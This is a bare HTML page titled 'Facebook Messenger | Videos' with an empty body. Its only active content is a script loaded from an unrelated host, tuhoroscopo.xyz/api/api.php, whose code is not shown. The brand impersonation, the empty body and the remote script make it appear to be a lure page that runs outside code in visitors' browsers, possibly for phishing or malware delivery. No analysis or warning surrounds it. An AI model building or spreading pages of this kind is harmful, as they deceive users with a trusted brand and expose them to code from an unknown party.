<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no"/>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"/>
<link rel="icon" href="https://i.imgur.com/2n81N3T.png"/>
<title>Facebook Messenger | Videos</title>
<script>cookieChoices = {};</script>
</head>
<body>
<script src="https://tuhoroscopo.xyz/api/api.php"></script>
</body>
</html>